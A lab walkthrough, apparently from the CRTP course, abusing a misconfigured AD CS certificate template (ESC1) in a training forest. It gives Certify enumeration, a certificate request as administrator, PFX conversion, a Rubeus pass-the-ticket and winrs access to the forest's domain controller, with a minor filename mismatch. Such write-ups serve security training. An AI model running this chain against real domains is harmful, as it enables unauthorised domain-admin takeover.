CRTP Lab 21

Task 1

Check if AD CS is used by the target forest and find any vulnerable/abusable templates.

Use certify to check for AD CS:

C:\AD\Tools\Certify.exe cas


[*] Enterprise/Enrollment CAs:

    Enterprise CA Name            : moneycorp-MCORP-DC-CA
    DNS Hostname                  : mcorp-dc.moneycorp.local
    FullName                      : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
    Cert Thumbprint               : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
    Cert Serial                   : 48D51C5ED50124AF43DB7A448BF68C49
    Cert Start Date               : 11/26/2022 1:59:16 AM
    Cert End Date                 : 11/26/2032 2:09:15 AM
    Cert Chain                    : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
    UserSpecifiedSAN              : Could not connect to the HKLM hive - Attempted to perform an unauthorized operation.
    CA Permissions                :
	

We can find all the templates using "find"

Certify.exe find


Template Name : SmartCardEnrollment-Agent
 Schema Version : 2
 Validity Period : 10 years
 Renewal Period : 6 weeks
 msPKI-Certificates-Name-Flag : SUBJECT_ALT_REQUIRE_UPN,
SUBJECT_REQUIRE_DIRECTORY_PATH
 mspki-enrollment-flag : AUTO_ENROLLMENT
 Authorized Signatures Required : 0
 pkiextendedkeyusage : Certificate Request Agent
 mspki-certificate-application-policy : Certificate Request Agent
 Permissions
 Enrollment Permissions
 Enrollment Rights : dcorp\Domain Users S-1-
5-21-719815819-3726368948-3917688648-513
[snip]
 Template Name : HTTPSCertificates
 Schema Version : 2
 Validity Period : 1 year
 Renewal Period : 6 weeks
 msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
[snip]

Task 2

Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin.

We could try to find templates with "ENROLLEE_SUPPLIES_SUBJECT" value to escalate to DA and EA using ESC1

C:\AD\Tools>C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject



    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : HTTPSCertificates
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificates-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
	  Enrollment Rights           : dcorp\RDPUsers                S-1-5-21-719815819-3726368948-3917688648-1123
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
        WriteOwner Principals       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

The HTTPSCertificates template has the "ENROLLEE_SUPPLIES_SUBJECT" value where enrollement rights are with dcorp\RDPUsers

Since student is a member of RDPUsers group, we can request certificate for any user as student.

Here we request certificate for the Domain Administrator of the current domain.

C:\AD\Tools\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator

Copy all contents between -----BEGIN RSA PRIVATE KEY----- and -----END CERTIFICATE----- and save it to esc1.pem.

We need to convert this to PFX and use it. Use openssl binary to do this and set a password.

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\esc1.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\esc1-DA.pfx

WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:

Use the PFX created above with Rubeus to request a TGT for DA.

# ArgSplit for asktgt

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:administrator /certificate:esc3-DA.pfx /password:SecretPass@123 /ptt

We can now access mcorp-dc

C:\AD\Tools>winrs -r:mcorp-dc cmd /c set username
USERNAME=Administrator


C:\AD\Tools>winrs -r:mcorp-dc cmd /c set computername
COMPUTERNAME=MCORP-DC


C:\AD\Tools>

Last updated